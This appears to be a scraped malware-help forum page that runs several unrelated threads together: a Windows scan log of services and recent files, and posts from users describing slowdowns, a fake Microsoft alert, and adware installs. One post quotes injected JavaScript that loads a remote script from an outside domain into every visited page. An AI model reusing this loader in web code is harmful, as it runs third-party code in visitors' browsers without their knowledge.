R1 RapportCerberus_1507067;RapportCerberus_1507067;C:\ProgramData\Trusteer\Rapport\store\exts\RapportCerberus\baseline\RapportCerberus64_1507067.sys [2015-9-3 958744]
R1 RapportEI64;RapportEI64;C:\Program Files (x86)\Trusteer\Rapport\bin\x64\RapportEI64.sys [2015-8-12 500184]
R1 RapportPG64;RapportPG64;C:\Program Files (x86)\Trusteer\Rapport\bin\x64\RapportPG64.sys [2015-8-12 489240]
R2 AMPPALR3;Intel® Centrino® Wireless Bluetooth® + High Speed Service;C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe [2013-2-13 770528]
R2 aswHwid;avast! HardwareID;C:\Windows\System32\drivers\aswHwid.sys [2014-9-28 28656]
R2 aswMonFlt;aswMonFlt;C:\Windows\System32\drivers\aswMonFlt.sys [2014-9-28 90968]
R2 aswStm;aswStm;C:\Windows\System32\drivers\aswStm.sys [2014-9-28 150672]
R2 avast! Antivirus;Avast Antivirus;C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2015-8-14 146600]
R2 avast! Firewall;Avast Firewall;C:\Program Files\AVAST Software\Avast\afwServ.exe [2015-8-14 109008]
R2 Bluetooth Device Monitor;Bluetooth Device Monitor;C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe [2012-12-13 1120784]
R2 Bluetooth Media Service;Bluetooth Media Service;C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe [2012-12-3 1361856]
R2 Bluetooth OBEX Service;Bluetooth OBEX Service;C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe [2012-12-3 1148864]
R2 BstHdDrv;BlueStacks Hypervisor;C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [2015-5-2 145528]
R2 BTHSSecurityMgr;Intel(R) Centrino(R) Wireless Bluetooth(R) + High Speed Security Service;C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe [2012-9-12 135984]
R2 ClickToRunSvc;Microsoft Office ClickToRun Service;C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe [2014-5-11 2765496]
R2 DiagTrack;Diagnostics Tracking Service;C:\Windows\System32\svchost.exe -k utcsvc [2009-7-14 27136]
R2 FPLService;TrueSuiteService;C:\Program Files\AuthenTec TrueSuite\TrueSuiteService.exe [2012-8-24 2125160]
R2 GfExperienceService;NVIDIA GeForce Experience Service;C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [2015-8-14 1155192]
R2 IAStorDataMgrSvc;Intel(R) Rapid Storage Technology;C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [2013-8-7 15720]
R2 Intel(R) Capability Licensing Service Interface;Intel(R) Capability Licensing Service Interface;C:\Program Files\Intel\iCLS Client\HeciServer.exe [2012-12-10 732160]
R2 jhi_service;Intel(R) Dynamic Application Loader Host Interface Service;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe [2013-10-23 167736]
R2 NisDrv;Microsoft Network Inspection System;C:\Windows\System32\drivers\NisDrvWFP.sys [2013-9-27 124568]
R2 NvNetworkService;NVIDIA Network Service;C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [2014-9-20 1872504]
R2 NvStreamSvc;NVIDIA Streamer Service;C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2015-8-14 5544568]
R2 PowerBiosServer;PowerBiosServer;C:\Program Files (x86)\Hotkey\PowerBiosServer.exe [2013-4-15 46592]
R2 RapportMgmtService;Rapport Management Service;C:\Program Files (x86)\Trusteer\Rapport\bin\RapportMgmtService.exe [2015-8-12 2255128]
R2 VBoxAswDrv;VBoxAsw Support Driver;C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxAswDrv.sys [2015-8-14 273824]
R2 ZeroConfigService;Intel(R) PROSet/Wireless Zero Configuration Service;C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [2013-2-8 3386608]
R3 AMPPAL;Intel® Centrino® Wireless Bluetooth® + High Speed Virtual Adapter;C:\Windows\System32\drivers\AmpPal.sys [2013-2-13 163808]
R3 AvastVBoxSvc;AvastVBox COM Service;C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe [2015-8-14 4047768]
R3 BstHdAndroidSvc;BlueStacks Android Service;C:\Program Files (x86)\BlueStacks\HD-Service.exe [2015-5-2 433784]
R3 BstHdLogRotatorSvc;BlueStacks Log Rotator Service;C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [2015-5-2 413304]
R3 BstHdUpdaterSvc;BlueStacks Updater Service;C:\Program Files (x86)\BlueStacks\HD-UpdaterService.exe [2015-5-2 831096]
R3 iusb3hub;Intel(R) USB 3.0 Hub Driver;C:\Windows\System32\drivers\iusb3hub.sys [2013-6-13 368112]
R3 iusb3xhc;Intel(R) USB 3.0 eXtensible Host Controller Driver;C:\Windows\System32\drivers\iusb3xhc.sys [2013-6-13 786416]
R3 MBfilt;MBfilt;C:\Windows\System32\drivers\MBfilt64.sys [2013-10-4 32344]
R3 NisSrv;Microsoft Network Inspection;C:\Program Files\Microsoft Security Client\NisSrv.exe [2015-4-30 366544]
R3 NvStreamKms;NvStreamKms;C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [2015-8-14 19576]
R3 nvvad_WaveExtensible;NVIDIA Virtual Audio Device (Wave Extensible) (WDM);C:\Windows\System32\drivers\nvvad64v.sys [2015-9-1 50472]
R3 RSBASTOR;Realtek PCIE CardReader Driver - BA;C:\Windows\System32\drivers\RtsBaStor.sys [2013-10-23 308960]
R3 RTL8167;Realtek 8167 NT Driver;C:\Windows\System32\drivers\Rt64win7.sys [2013-10-4 883928]
R3 ScpVBus;Scp Virtual Bus Driver;C:\Windows\System32\drivers\ScpVBus.sys [2013-12-27 39168]
R3 SmbDrvI;SmbDrvI;C:\Windows\System32\drivers\Smb_driver_Intel.sys [2013-6-11 31032]
R3 TrueService;TrueAPI Service component;C:\Program Files\Common Files\AuthenTec\TrueService.exe [2012-7-16 401256]
R3 usbfilter;AMD USB Filter Driver;C:\Windows\System32\drivers\usbfilter.sys [2013-10-4 58536]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2014-4-12 103608]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2014-4-11 124088]
S2 dbupdate;Dropbox Update Service (dbupdate);C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2015-9-12 136048]
S2 McOobeSv2;McAfee OOBE Service2;"C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc --> C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [?]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2015-7-9 327296]
S3 ahcix64s;ahcix64s;C:\Windows\System32\drivers\ahcix64s.sys [2013-10-4 293720]
S3 amd_sata;amd_sata;C:\Windows\System32\drivers\amd_sata.sys [2013-10-4 82600]
S3 amdhub30;AMD USB 3.0 Hub Driver;C:\Windows\System32\drivers\amdhub30.sys [2013-10-4 108128]
S3 amdxhc;AMD USB 3.0 Host Controller Driver;C:\Windows\System32\drivers\amdxhc.sys [2013-10-4 228448]
S3 AMPPALP;Intel® Centrino® Wireless Bluetooth® + High Speed Protocol;C:\Windows\System32\drivers\AmpPal.sys [2013-2-13 163808]
S3 asahci64;asahci64;C:\Windows\System32\drivers\asahci64.sys [2013-10-4 52440]
S3 asmthub3;ASMedia USB3 Hub Service;C:\Windows\System32\drivers\asmthub3.sys [2013-10-4 140032]
S3 asmtxhci;ASMEDIA XHCI Service;C:\Windows\System32\drivers\asmtxhci.sys [2013-10-4 420608]
S3 btmaux;Intel Bluetooth Auxiliary Service;C:\Windows\System32\drivers\btmaux.sys [2012-10-30 131968]
S3 btmhsf;btmhsf;C:\Windows\System32\drivers\btmhsf.sys [2012-12-3 1342848]
S3 DAUpdaterSvc;Dragon Age: Origins - Content Updater;C:\Program Files (x86)\Steam\steamapps\common\Dragon Age Ultimate Edition\bin_ship\DAUpdaterSvc.Service.exe --> C:\Program Files (x86)\Steam\steamapps\common\Dragon Age Ultimate Edition\bin_ship\DAUpdaterSvc.Service.exe [?]
S3 dbupdatem;Dropbox Update Service (dbupdatem);C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2015-9-12 136048]
S3 EtronHub3;Etron USB 3.0 Extensible Hub Driver;C:\Windows\System32\drivers\EtronHub3.sys [2013-10-4 65408]
S3 EtronSTOR;Etron Enhance USB BOT/UASP Mass Storage Driver;C:\Windows\System32\drivers\EtronSTOR.sys [2013-10-4 39296]
S3 EtronXHCI;Etron USB 3.0 Extensible Host Controller Driver;C:\Windows\System32\drivers\EtronXHCI.sys [2013-10-4 94208]
S3 FLxHCIc;Fresco Logic xHCI (USB3) Device Driver;C:\Windows\System32\drivers\FLxHCIc.sys [2013-10-4 250024]
S3 FLxHCIh;Fresco Logic xHCI (USB3) Hub Device Driver;C:\Windows\System32\drivers\FLxHCIh.sys [2013-10-4 77480]
S3 fssfltr;fssfltr;C:\Windows\System32\drivers\fssfltr.sys [2013-10-4 48488]
S3 fsssvc;Windows Live Family Safety Service;C:\Program Files (x86)\Windows Live\Family Safety\fsssvc.exe [2011-5-13 1492840]
S3 iaStorS;iaStorS;C:\Windows\System32\drivers\iaStorS.sys [2013-10-4 652760]
S3 ibtfltcoex;ibtfltcoex;C:\Windows\System32\drivers\iBtFltCoex.sys [2012-8-6 68136]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\Windows\System32\ieetwcollector.exe [2015-9-9 114688]
S3 IntcDAud;Intel(R) Display Audio;C:\Windows\System32\drivers\IntcDAud.sys [2013-10-4 452088]
S3 Intel(R) Capability Licensing Service TCP IP Interface;Intel(R) Capability Licensing Service TCP IP Interface;C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [2012-12-10 803872]
S3 ioatdma1;ioatdma1;C:\Windows\System32\drivers\qd162x64.sys [2013-10-4 40144]
S3 ioatdma2;Intel(R) QuickData Technology device ver.2;C:\Windows\System32\drivers\qd262x64.sys [2013-10-4 42192]
S3 McAWFwk;McAfee Activation Service;C:\PROGRA~1\mcafee\msc\mcawfwk.exe [2013-10-4 332080]
S3 MotioninJoyXFilter;MotioninJoy Virtual Xinput device Filter Driver;C:\Windows\System32\drivers\MijXfilt.sys [2013-12-27 121416]
S3 mv91cons;mv91cons;C:\Windows\System32\drivers\mv91cons.sys [2013-10-4 18944]
S3 MyWiFiDHCPDNS;Wireless PAN DHCP Server;C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [2013-2-8 273136]
S3 nusb3hub;Renesas Electronics USB 3.0 Hub Driver;C:\Windows\System32\drivers\nusb3hub.sys [2013-10-4 107912]
S3 nusb3xhc;Renesas Electronics USB 3.0 Host Controller Driver;C:\Windows\System32\drivers\nusb3xhc.sys [2013-10-4 226696]
S3 NvStUSB;NVIDIA Stereoscopic 3D USB driver;C:\Windows\System32\drivers\nvstusb.sys [2013-10-4 450848]
S3 rccfg;AMD-RAID Config Device;C:\Windows\System32\drivers\rccfg.sys [2013-10-4 21680]
S3 rcraid;rcraid;C:\Windows\System32\drivers\rcraid.sys [2013-10-4 526000]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2010-11-21 59392]
S3 TsUsbGD;Remote Desktop Generic USB Device;C:\Windows\System32\drivers\TsUsbGD.sys [2010-11-21 31232]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2013-10-27 1255736]
S4 wlcrasvc;Windows Live Mesh remote connections service;C:\Program Files\Windows Live\Mesh\wlcrasvc.exe [2010-9-22 57184]
.
=============== Created Last 30 ================
.
2015-09-14 17:28:09 11745192 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{DA3E3A35-F0A0-4F5A-95CF-B7844E5D8B32}\mpengine.dll
2015-09-14 17:17:56 -------- d--h--w- C:\OneDriveTemp
2015-09-13 17:25:28 -------- d--h--w- C:\$Windows.~BT
2015-09-13 13:56:07 11745192 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2015-09-12 18:06:52 -------- d-----r- C:\Users\Oscar\Dropbox
2015-09-12 18:04:46 -------- d-----w- C:\Users\Oscar\AppData\Roaming\Dropbox
2015-09-12 18:03:44 -------- d-----w- C:\Program Files (x86)\Dropbox
2015-09-12 18:03:42 -------- d-----w- C:\Users\Oscar\AppData\Local\Dropbox
2015-09-12 18:03:42 -------- d-----w- C:\ProgramData\Dropbox
2015-09-12 10:29:28 -------- d-----w- C:\Users\Oscar\.android
2015-09-09 21:27:53 41984 ----a-w- C:\Windows\System32\UtcResources.dll
2015-09-09 21:26:49 70656 ----a-w- C:\Windows\SysWow64\fontsub.dll
2015-09-08 13:28:15 -------- d-----r- C:\Program Files (x86)\Skype
2015-09-06 16:08:02 1190000 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{A9AA3DFF-56E4-4F23-92A3-0295AE0A54AB}\gapaengine.dll
2015-09-01 00:56:29 -------- d-----w- C:\Windows\SysWow64\NV
2015-09-01 00:56:29 -------- d-----w- C:\Windows\System32\NV
2015-09-01 00:16:42 50472 ----a-w- C:\Windows\System32\drivers\nvvad64v.sys
2015-09-01 00:16:41 69416 ----a-w- C:\Windows\SysWow64\nvaudcap32v.dll
.
==================== Find3M ====================
.
2015-09-02 03:04:49 41984 ----a-w- C:\Windows\System32\lpk.dll
2015-09-02 03:04:46 100864 ----a-w- C:\Windows\System32\fontsub.dll
2015-09-02 03:04:44 14336 ----a-w- C:\Windows\System32\dciman32.dll
2015-09-02 03:04:42 46080 ----a-w- C:\Windows\System32\atmlib.dll
2015-09-02 02:48:28 10240 ----a-w- C:\Windows\SysWow64\dciman32.dll
2015-09-02 02:48:25 34304 ----a-w- C:\Windows\SysWow64\atmlib.dll
2015-09-02 02:47:18 25600 ----a-w- C:\Windows\SysWow64\lpk.dll
2015-09-02 01:51:28 3209216 ----a-w- C:\Windows\System32\win32k.sys
2015-09-02 01:47:08 372736 ----a-w- C:\Windows\System32\atmfd.dll
2015-09-02 01:33:48 299520 ----a-w- C:\Windows\SysWow64\atmfd.dll
2015-08-27 18:18:27 2004480 ----a-w- C:\Windows\System32\msxml6.dll
2015-08-27 18:18:27 1887232 ----a-w- C:\Windows\System32\msxml3.dll
2015-08-27 18:13:03 2048 ----a-w- C:\Windows\System32\msxml6r.dll
2015-08-27 18:13:03 2048 ----a-w- C:\Windows\System32\msxml3r.dll
2015-08-27 17:58:14 1391104 ----a-w- C:\Windows\SysWow64\msxml6.dll
2015-08-27 17:58:14 1241088 ----a-w- C:\Windows\SysWow64\msxml3.dll
2015-08-27 17:51:26 2048 ----a-w- C:\Windows\SysWow64\msxml6r.dll
2015-08-27 17:51:26 2048 ----a-w- C:\Windows\SysWow64\msxml3r.dll
2015-08-27 00:37:01 1423120 ----a-w- C:\Windows\SysWow64\nvspcap.dll
2015-08-27 00:37:01 1316000 ----a-w- C:\Windows\SysWow64\nvspbridge.dll
2015-08-27 00:36:47 1756424 ----a-w- C:\Windows\System32\nvspbridge64.dll
2015-08-27 00:36:47 1710568 ----a-w- C:\Windows\System32\nvspcap64.dll
2015-08-26 18:07:11 98304 ----a-w- C:\Windows\System32\wudriver.dll
2015-08-26 18:07:11 3165696 ----a-w- C:\Windows\System32\wucltux.dll
2015-08-26 18:07:11 192000 ----a-w- C:\Windows\System32\wuwebv.dll
2015-08-26 18:06:43 91136 ----a-w- C:\Windows\System32\WinSetupUI.dll
2015-08-26 18:06:33 12288 ----a-w- C:\Windows\System32\wu.upgrade.ps.dll
2015-08-26 18:06:30 37376 ----a-w- C:\Windows\System32\wuapp.exe
2015-08-26 17:56:25 93184 ----a-w- C:\Windows\SysWow64\wudriver.dll
2015-08-26 17:56:25 173056 ----a-w- C:\Windows\SysWow64\wuwebv.dll
2015-08-26 17:55:37 34816 ----a-w- C:\Windows\SysWow64\wuapp.exe
2015-08-25 14:24:20 937776 ----a-w- C:\Windows\System32\nvvsvc.exe
2015-08-25 14:24:20 75056 ----a-w- C:\Windows\System32\nv3dappshextr.dll
2015-08-25 14:24:20 62584 ----a-w- C:\Windows\System32\nvshext.dll
2015-08-25 14:24:20 385144 ----a-w- C:\Windows\System32\nvmctray.dll
2015-08-25 14:24:20 3496752 ----a-w- C:\Windows\System32\nvsvc64.dll
2015-08-25 14:24:20 2558584 ----a-w- C:\Windows\System32\nvsvcr.dll
2015-08-25 14:24:20 1062520 ----a-w- C:\Windows\System32\nv3dappshext.dll
2015-08-25 14:24:19 6884984 ----a-w- C:\Windows\System32\nvcpl.dll
2015-08-25 12:35:29 5165808 ----a-w- C:\Windows\System32\nvcoproc.bin
2015-08-15 06:34:10 2724864 ----a-w- C:\Windows\System32\mshtml.tlb
2015-08-15 06:33:56 4096 ----a-w- C:\Windows\System32\ieetwcollectorres.dll
2015-08-15 06:18:47 66560 ----a-w- C:\Windows\System32\iesetup.dll
2015-08-15 06:18:00 48640 ----a-w- C:\Windows\System32\ieetwproxystub.dll
2015-08-15 06:17:54 417792 ----a-w- C:\Windows\System32\html.iec
2015-08-15 06:17:49 585216 ----a-w- C:\Windows\System32\vbscript.dll
2015-08-15 06:17:25 88064 ----a-w- C:\Windows\System32\MshtmlDac.dll
2015-08-15 06:04:47 114688 ----a-w- C:\Windows\System32\ieetwcollector.exe
2015-08-15 06:04:46 144384 ----a-w- C:\Windows\System32\ieUnatt.exe
2015-08-15 06:04:25 814080 ----a-w- C:\Windows\System32\jscript9diag.dll
2015-08-15 06:00:44 5923328 ----a-w- C:\Windows\System32\jscript9.dll
2015-08-15 05:57:20 968704 ----a-w- C:\Windows\System32\MsSpellCheckingFacility.exe
2015-08-15 05:53:22 2724864 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2015-08-15 05:46:15 77824 ----a-w- C:\Windows\System32\JavaScriptCollectionAgent.dll
2015-08-15 05:40:29 504832 ----a-w- C:\Windows\SysWow64\vbscript.dll
2015-08-15 05:40:12 62464 ----a-w- C:\Windows\SysWow64\iesetup.dll
2015-08-15 05:39:32 47616 ----a-w- C:\Windows\SysWow64\ieetwproxystub.dll
2015-08-15 05:39:22 341504 ----a-w- C:\Windows\SysWow64\html.iec
2015-08-15 05:38:34 64000 ----a-w- C:\Windows\SysWow64\MshtmlDac.dll
2015-08-15 05:29:36 115712 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2015-08-15 05:29:12 620032 ----a-w- C:\Windows\SysWow64\jscript9diag.dll
2015-08-15 05:22:47 1359360 ----a-w- C:\Windows\System32\mshtmlmedia.dll
2015-08-15 05:22:03 2126336 ----a-w- C:\Windows\System32\inetcpl.cpl
2015-08-15 05:16:37 60416 ----a-w- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
2015-08-15 05:10:32 4520448 ----a-w- C:\Windows\SysWow64\jscript9.dll
2015-08-15 05:07:28 2427392 ----a-w- C:\Windows\System32\wininet.dll
2015-08-15 05:01:47 2052608 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2015-08-15 05:01:23 1155072 ----a-w- C:\Windows\SysWow64\mshtmlmedia.dll
2015-08-15 04:43:00 1951232 ----a-w- C:\Windows\SysWow64\wininet.dll
2015-08-14 10:36:32 1048344 ----a-w- C:\Windows\System32\drivers\aswsnx.sys
2015-08-14 10:36:23 93528 ----a-w- C:\Windows\System32\drivers\aswRdr2.sys
2015-08-14 10:36:23 90968 ----a-w- C:\Windows\System32\drivers\aswMonFlt.sys
2015-08-14 10:36:23 65224 ----a-w- C:\Windows\System32\drivers\aswRvrt.sys
2015-08-14 10:36:23 28656 ----a-w- C:\Windows\System32\drivers\aswHwid.sys
2015-08-14 10:36:23 274808 ----a-w- C:\Windows\System32\drivers\aswVmm.sys
2015-08-14 10:36:23 150672 ----a-w- C:\Windows\System32\drivers\aswStm.sys
2015-08-14 10:36:21 43112 ----a-w- C:\Windows\avastSS.scr
2015-08-14 10:36:16 28144 ----a-w- C:\Windows\System32\drivers\aswKbd.sys
2015-08-14 10:36:14 115152 ----a-w- C:\Windows\System32\drivers\ngvss.sys
2015-08-14 10:36:08 454016 ----a-w- C:\Windows\System32\drivers\aswNdisFlt.sys
2015-08-12 22:10:16 778440 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2015-08-12 22:10:16 142536 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2015-08-12 12:04:36 394584 ----a-w- C:\Windows\System32\drivers\RapportKE64.sys
2015-08-12 12:04:36 139896 ----a-w- C:\Windows\System32\drivers\RapportHades64.sys
2015-08-11 04:52:30 72504 ----a-w- C:\Windows\System32\nvaudcap64v.dll
2015-08-07 11:06:30 1898104 ----a-w- C:\Windows\System32\nvdispco6435560.dll
2015-08-07 11:06:30 1558832 ----a-w- C:\Windows\System32\nvdispgenco6435560.dll
2015-08-05 17:56:14 1110016 ----a-w- C:\Windows\System32\schedsvc.dll
2015-08-05 17:56:07 24576 ----a-w- C:\Windows\System32\jnwmon.dll
2015-08-05 17:56:06 275456 ----a-w- C:\Windows\System32\InkEd.dll
2015-08-05 17:40:50 216064 ----a-w- C:\Windows\SysWow64\InkEd.dll
2015-08-04 18:03:10 692672 ----a-w- C:\Windows\System32\winload.efi
2015-08-04 18:00:24 616360 ----a-w- C:\Windows\System32\winresume.efi
2015-08-04 17:56:54 63488 ----a-w- C:\Windows\System32\setbcdlocale.dll
2015-08-04 17:56:37 59392 ----a-w- C:\Windows\System32\appidapi.dll
2015-08-04 17:56:37 32768 ----a-w- C:\Windows\System32\appidsvc.dll
2015-08-04 17:55:57 17920 ----a-w- C:\Windows\System32\appidcertstorecheck.exe
2015-08-04 17:55:57 147456 ----a-w- C:\Windows\System32\appidpolicyconverter.exe
2015-08-04 17:47:42 50688 ----a-w- C:\Windows\SysWow64\appidapi.dll
2015-08-04 16:58:09 61440 ----a-w- C:\Windows\System32\drivers\appid.sys
.
============= FINISH: 3:41:46.07 ===============

Attach.txt should also be attached...

Thank you very much for your help so far. :)

Attached Files

Attach.txt (14.3 KB)

Hello Experts,

I'll first let you know that your dds scanner wouldn't operate on my laptop which has Win 8.1.
I imagine it is either the same as or a close facsimile to "Combofix" because that wouldn't work on 8.1 either. Because of this I downloaded and ran rkill instead (In safe mode) which came up empty.

Anyway, I have a 3yr old HP 15 laptop which runs a AMD sloth processor.
My anti-virus is the latest ESET and I also have an active Malwarebytes program. I've also run Super anti-spyware with negative results.

Somehow, whatever it is that's infected my system got past these and now it takes nearly two minutes for Internet Explorer to load as well as significantly slowed down every other process.

I suspect the Trojan? Rootkit? was initiated when I received a warning sheet supposedly from Microsoft with a female voiceover saying my computer had been compromised and that I was to run their new clean up program.

I new it was suspicious when nothing short of a manual shutdown would stop the warning from continuing. So subsequently, that's what I had to do.
I've run all my malware, spyware, antivirus programs in safe mode, but they all say nothing has been found.
I thought of returning the unit to factory settings, but somehow I doubt whether that will solve my issue.

I've run out of ideas. There is definitely a problem. I hope you can help.

Windjammer14:banghead:

In my case I am using Firefox to create automated test cases. During this process is discovered fra.loadresync.net was running a delaying my page loads and actions on a page, anytime the page went to gather information this site would be called. I have researched online and I find very little about this link. During my investigations I found that 2 new lines of code are being added to each page I visit using Firefox. This does not happen on any other browser I use on my computer. I am currently running Window 10. I have tried using Firefox's page blocking tools and I added a page blocking tool. None of this has helped. The blocking tool eventually blocked me from my own webpage I was trying to test. I have even uninstalled and reinstalled Firefox with no luck.

I have also run several malware tools with no help.

This following lines of code are being added to each page:

(function(d,c,s){ var b={};b.version='114';b.clientuid='03A144c388C33A1C';window._rvz=b;var a=d[c](s);a.src='//fra.loadresync.net/%73d/1060/1052.js';document.body.appendChild(a)})(document,'create'+'Element','script');

<script src="//fra.loadresync.net/%73d/1060/1052.js"></script>

I have worked with my developer, who is in another state, but this is not happening on his install of Firefox. I do not know where to go from here.

Hi there,

Sorry, i tried some removal process before asking here.
Its my 11 yr old Daughter's computer, My 6 yr old was doing some google search and she noticed a spinning wheel and out of curiosity clicked on it. Then something downloaded and asked permission to install. I clicked skip and skip and again skip but still i noticed a message on taskbar saying some programs been installed. I went to check on programs been installed there were 5-6 of them.
I immediately tried to uninstall them but some of them were uninstalled but next one get installed, it went like this and i guess about a dozen of them got installed.
I started to run MalwareBytes antimalware which detected quite a lot (in hundreds) and computer restarted. Apparently it was not cleaned (i might have had done some mistake here as i was doing in hast)
I ran it again and this time cleaned it thoroughly. Then restarted in safe mode and scaned with MBAM, nothing found this time.
Still my apps list has programs like MaxDriverUpdater Services by CSDI, DesktopSearch by Unique Solutions, Note-UP by QUAHOG LIMITED, Search module by Goodzo and space bar use by space bar use. when i click on them it gives uninstall option but clicking uninstall does nothing.
Then I ran AdwCleaner downloaded from bleeping computers which i think deleted quite a few of them, but i still have some left. which can not be uninstalled.
DDS logs are included and AdwCleaner log is also included. NOTE: AdwCleaner was run before DDS. sorry.

Edit: Browser home pages were all changed which i changed back and uninstalled the extensions. Some search bars were added which were uninstalled through control panel or by MBAM.

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.10240.16412
Run by P at 12:49:58 on 2015-09-17
Microsoft Windows 10 Pro 10.0.10240.0.1252.1.2057.18.4095.2249 [GMT 10:00]
.
AV: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k RPCSS
C:\WINDOWS\system32\dwm.exe
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\WINDOWS\system32\atiesrxx.exe
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\Windows\System32\WUDFHost.exe
C:\WINDOWS\system32\atieclxx.exe
C:\WINDOWS\System32\svchost.exe -k NetworkService
C:\WINDOWS\System32\spoolsv.exe
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
C:\WINDOWS\System32\svchost.exe -k utcsvc
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\WINDOWS\system32\svchost.exe -k appmodel
C:\WINDOWS\system32\dashost.exe
C:\WINDOWS\system32\taskhostw.exe
C:\WINDOWS\system32\sihost.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
C:\WINDOWS\Explorer.EXE
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
svchost.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\WINDOWS\system32\SettingSyncHost.exe
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Program Files\Logitech\SetPointP\SetPoint.exe
C:\Users\P\AppData\Local\Microsoft\OneDrive\OneDrive.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Program Files\Microsoft Office\Office15\ONENOTEM.EXE
C:\Program Files\Common Files\LogiShrd\KHAL3\KHALMNPR.EXE
C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe
C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
C:\WINDOWS\sysWOW64\wbem\wmiprvse.exe
C:\WINDOWS\system32\ApplicationFrameHost.exe
C:\WINDOWS\system32\svchost.exe -k UnistackSvcGroup
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\WINDOWS\system32\SearchProtocolHost.exe
C:\WINDOWS\system32\SearchFilterHost.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = Google
BHO: Adobe PDF Link Helper: {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
BHO: Skype for Business Browser Helper: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll
BHO: Adobe PDF Conversion Toolbar Helper: {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
BHO: Logitech SetPoint: {AF949550-9094-4807-95EC-D1C317803333} - C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll
